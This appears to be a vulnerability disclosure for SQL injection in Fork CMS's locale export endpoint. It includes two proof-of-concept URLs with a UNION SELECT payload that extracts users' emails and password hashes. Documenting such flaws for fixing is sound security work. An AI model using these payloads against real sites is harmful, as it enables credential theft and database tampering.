Description

When an authenticated user exports translations, the user calls an URL like this: http://forkcms.site/private/de/locale/export?token=5z0ao1nk4p&type%5B0%5D=lbl&language%5B0%5D=de The parameter type[0] and language[0] are both vulnerable for SQL injection.

Proof of Concept

PoC for parameter type[0]

• As an authenticated user, call the URL

http://forkcms.site/private/de/locale/export?token=2m4a1w19v6&type[0]=lb%27)%20union%20select%20users.is_god,TO_BASE64(users.email),%27de2%27,%27de5%27,%27de3%27,%27de4%27,TO_BASE64(users.password)%20from%20users%20--+&language[0]=de

• In this case, you should get an xml with the users and passwords from users table (base64 encoded).
• The SQL Injection decoded looks like this

') union select users.is_god,TO_BASE64(users.email),'de2','de5','de3','de4',TO_BASE64(users.password) from users --+

PoC for parameter language[0]

• As an authenticated user, call the URL

http://forkcms.site/private/de/locale/export?token=2m4a1w19v6&type[0]=lbl&language[0]=de%27)%20union%20select%20users.is_god,TO_BASE64(users.email),%27de2%27,%27de5%27,%27de3%27,%27de4%27,TO_BASE64(users.password)%20from%20users%20--+

• In this case, you should get an xml with all translations, but also with users and passwords at the end of the file (base64 encoded).
• The SQL injection payload decoded looks like this:

') union select users.is_god,TO_BASE64(users.email),'de2','de5','de3','de4',TO_BASE64(users.password) from users --+

Impact

An attacker can steal or tamper data in the database.